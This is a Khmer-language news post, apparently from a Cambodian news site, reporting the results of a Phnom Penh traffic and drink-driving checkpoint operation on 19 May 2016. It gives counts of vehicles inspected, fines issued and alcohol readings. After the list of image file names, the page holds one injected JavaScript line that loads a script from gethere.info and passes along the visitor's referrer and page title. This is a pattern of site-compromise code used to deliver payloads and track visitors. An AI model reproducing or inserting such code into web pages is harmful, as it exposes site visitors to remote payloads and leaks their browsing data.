ព្រឹតិ្តការណ៍ថ្មីៗ

លទ្ធផលនៃការចុះត្រួតពិនិត្យនិងរិតបន្តឹងច្បាប់ចរាចរណ៍ ថ្ងៃទី១៩យប់មិុញ

2 ឆ្នាំ មុន 2 tnn_admin

ភ្នំពេញ៖ ក្រោមឥទ្ធពលនៃជាតិស្រវឹងយប់មិុញនេះ

បងប្អូនដែលបានឆ្លងកាត់មិនត្រូវបានសមត្ថកិច្ចឃាត់ខ្លួននោះទេ ខណ:បើកបរឆ្លងកាត់គោលដៅត្រួតពិនិត្យរិតបន្តឹងច្បាប់ចរាចរណ៍ផ្លូវគោកនាយប់ថ្ងៃទី ១៩ ខែឧសភា ខែឆ្នាំ២០១៦យប់នេះ ដោយសមត្ថកិច្ច ទូទាំងរាជធានីភ្នំពេញបានចុះអនុវត្តន៍តាមគោលដៅ ចាប់ពីវេលាម៉ោង៩យប់ រហូតដល់ម៉ោង៣ទាបភ្លឺ ជាលទ្ធផលសមត្ថកិច្ចបានធ្វើការត្រួតពនិត្យយានយន្តផងដែរ មានចំនួន ៧០៩គ្រឿង ក្នុងនោះម៉ូតូមានចំនួន៤៨៩គ្រឿង រីឯ រថយន្តមានចំនួន២២០គ្រឿង។

ក្នុងនោះផងដែរចំពោះយានយន្តដែលបានចេញប័ណ្ណពិន័យបទល្មើស ចំនួន១២៦គ្រឿង ដែលមានម៉ូតូចំនួន១១៩គ្រឿងនិងរថយន្ត៧គ្រឿង។ដោយឡែកអ្នកបើកយានយន្តចំនួន៥នាក់ត្រូវបានអប់រំ ក្នុងនោះ អ្នកបើកម៉ូតូ៤នាក់ និងអ្នកបើកបររថយន្តចំនួន០១នាក់ត្រូវបានសមត្ថកិច្ចអប់រំដែលមានអត្រាជាតិស្រវឹងក្រោម០,២៥ នៅនឹងគោលដៅត្រួតពិនិត្យ។

នៅក្នុងនោះផងដែរសមត្ថកិច្ចយើងបាន ពិន័យទៅលើអ្នកបើកបររម៉ូតូចំនួន០៥នាក់ដែលមានអត្រាជាតិស្រវឹងចាប់ពី០,២៥ ដល់០,៣៩ មីលីក្រាម។

រយ:ពេល៨៤លើកនេះបានឃាត់អ្នកបើកបរយានយន្តចំនួន៣៩៦នាក់ ដែលក្នុងនោះមានអ្នកបើកបររថយន្តចំនួន៩៥នាក់ដែលមានស្ត្រី០៣នាក់នៅក្នុងនោះ រីឯតួរលេខអ្នកបើកបរម៉ូតូមានចំនួន៣០១។

FB_IMG_1463722414711 FB_IMG_1463722398492 FB_IMG_1463722394121 FB_IMG_1463722366075 FB_IMG_1463722313310 FB_IMG_1463722297056 FB_IMG_1463722255611

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ